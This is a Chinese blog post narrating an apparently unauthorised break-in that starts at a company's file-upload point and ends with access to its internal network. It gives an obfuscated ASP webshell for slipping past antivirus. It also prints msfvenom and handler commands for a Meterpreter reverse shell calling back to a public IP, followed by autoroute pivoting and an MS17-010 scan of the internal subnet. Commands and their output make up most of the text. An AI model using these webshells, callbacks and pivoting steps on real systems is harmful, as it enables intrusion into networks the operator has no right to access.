从某公司文件上传到内网漫游

gclome

原文链接：从某公司文件上传到内网漫游

今天拿到一个某公司文件上传点，就尝试一波getshell，最后成功进入内网，这里记录一下思路和操作。对于大佬来说应该都很基础，但是对于我这个划水混子来说还是学到了一些东西。


这个站我拿到的时候就直接是一个文件上传点了，通过对这个站点分析得知应该是由一个文件遍历漏洞找到的文件上传点

​
​

上传一句话木马连接shell
就想着能不能上传一个木马连接shell，尝试上传了普通的asp一句话木马，蚁剑刚测试连接成功就断开，上传页面也显示文件被删除。

有朋友上传了免杀asp大马感觉用起来不方便，也不稳定，所以就构造asp的免杀一句话木马

一个密码为"LandGrey"的原始ASP一句话脚本代码如下

1. <%@codepage=65000%><%response.codepage=65001:eval(request("LandGrey"))%>

复制代码

1. 参考免杀webshell
   
2. https://github.com/LandGrey/webshell-detect-bypass

复制代码

UTF-7编码后如下

1. <%@codepage=65000%>
   
2. <%
   
3. +AHIAZQBzAHAAbwBuAHMAZQAuAGMAbwBkAGUAcABhAGcAZQA9ADYANQAwADAAMQA6AGUAdgBhAGwAKAByAGUAcQB1AGUAcwB0ACgAIgBMAGEAbgBkAEcAcgBlAHkAIgApACk-
   
4. %>

复制代码

这种方式可以躲过较多webshell检测软件查杀，但是D盾Webshell查杀工具，提示脚本使用了UTF-7编码，并不能做到完全不被察觉。这里我感觉应该能绕过服务器内的查杀软件了


​

​

失败的提权过程
看了下ip发现是内网，用户为iis，尝试提权也失败了
​

查看运行的服务
​

存在360杀毒，所以之前的普通一句话木马都被杀了

内网漫游
在这里我考虑了很久，想打入内网我想到了三种方式。可以直接把数据转发出来本地代理渗透内网，但是目标主机是内网IP，还可以用lcx将内网主机3389端口转发到有公网IP的服务器上，我们再进行远程登陆，但是我没有windows服务器还没有足够的权限去实现，甚至还可以用msf生成木马直接连接，但是想到有360杀毒应该会被杀。

最后一种方式我试了一下，先在本地kali虚拟机生成一个连接到服务器的msf木马，再转发到本地macos通过蚁剑上传到目标内网windows上

1. msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=45.77.124.165 lport=1234 -f exe -o red.exe
   
2. scp -p red.exe reder@172.22.163.184:~/

复制代码

​


上传成功，竟然没被360杀掉还是比较意外

​
先通过蚁剑开启该木马再登陆服务器开启msf连接木马

1. use exploit/multi/handler
   
2. set payload windows/x64/meterpreter/reverse_tcp
   
3. set lhost 45.77.124.165
   
4. set lport 1234
   
5. run

复制代码

​


接下来就是获取目标网段信息，在MSF平台监听端，我们获取反弹的shell后（即session），我们可以直接在meterpreter控制终端进行目标网段信息的查询，具体查询命令如下

1. meterpreter > run get_local_subnets
   
2. 
   
3. [!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
   
4. [!] Example: run post/multi/manage/autoroute OPTION=value [...]
   
5. Local subnet: 10.255.4.0/255.255.255.0

复制代码

添加目标网段路由

1. meterpreter > run autoroute -s 10.255.4.0/24
   
2. [!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
   
3. [!] Example: run post/multi/manage/autoroute OPTION=value [...]
   
4. [*] Adding a route to 10.255.4.0/255.255.255.0...
   
5. [+] Added route to 10.255.4.0/255.255.255.0 via 218.70.16.163
   
6. [*] Use the -p option to list all active routes

复制代码

路由查询

1. meterpreter > run autoroute -p
   
2.    10.255.4.0         255.255.255.0      Session 4
   
3. [!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
   
4. [!] Example: run post/multi/manage/autoroute OPTION=value [...]
   
5. 
   
6. Active Routing Table
   
7. ====================
   
8. 
   
9.    Subnet             Netmask            Gateway
   
10.    ------             -------            -------

复制代码

我们将去往内网的路由打通后，接下来就可以使用MSF平台直接对内网主机扫描和进行各种高危漏洞的直接渗透利用了。

首先我们需要退到MSF攻击平台的操作面，为后面调用其他攻击模块做好准备，具体操作如下。

1. meterpreter > background
   
2. msf5 exploit(multi/handler) > sessions -i
   
3. 
   
4. Active sessions
   
5. ===============
   
6. 
   
7.   Id  Name  Type                     Information                     Connection
   
8.   --  ----  ----                     -----------                     ----------
   
9.   4         meterpreter x64/windows  IIS APPPOOL\ECI_EEMS @ WEBSRV3  45.77.124.165:1234 -> xx.xx.xx.xx:29007 (10.255.4.3)
   
10. 
    
11. msf5 exploit(multi/handler) > use auxiliary/scanner/smb/smb_ms17_010
    
12. msf5 auxiliary(scanner/smb/smb_ms17_010) > set rhosts 10.255.4.0/24
    
13. rhosts => 10.255.4.0/24
    
14. msf5 auxiliary(scanner/smb/smb_ms17_010) > set threads 50
    
15. threads => 50
    
16. msf5 auxiliary(scanner/smb/smb_ms17_010) > run

复制代码

​

扫描了一下网段内MS17-010漏洞,过主机漏洞扫描，我们发现很多主机都存在MS17-010漏洞。

​


打完收工
到了这里我们可以做的事情就比较多了，内网的一切尽在掌握。自此我们使用的传码到"MSF 的跳转路由转发"直接使用外网的MSF平台实现对内网私有主机的攻击实战结束，好了打完收工。